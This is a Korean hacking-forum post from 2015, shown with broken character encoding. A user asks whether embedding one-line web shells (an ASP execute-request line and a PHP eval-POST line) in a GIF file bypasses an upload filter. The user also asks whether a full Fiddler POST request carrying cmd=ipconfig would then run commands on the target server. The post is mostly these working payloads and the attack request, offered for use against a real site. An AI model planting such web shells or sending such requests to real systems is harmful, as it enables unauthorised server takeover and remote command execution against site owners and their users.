http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=209 [º¹»ç]
±× ÆÄÀÏ ¾÷·Îµå ¿ìȸÇؼ (gif ÆÄÀÏ¿¡ ¾Æ·¡ Äڵ带 ³Ö¾î¼)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
ÆäÀÌÁö¿¡ »ðÀÔÇÑ´ÙÀ½¿¡ ipconfig°°Àº ¸í·ÉÀ» ½ÇÇèÇغ¸°í ½ÍÀºµ¥
(À§¿¡ Äڵ尡 cmd ºÒ·¯¿Í¼ cmd ¸í·ÉÇϴ°ÅÁÒ?)
Çǵ鷯¿¡ composer ÅÇ¿¡ ¾Æ·¡ ³»¿ë º¸³»¸é µÇ³ª¿ä??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;
¿ä·±½ÄÀ¸·Î executeÇؼ Å×½ºÆ®ÇϸéµÇ³ª¿ä?
|
Hit : 4899 Date : 2015/07/26 12:22
|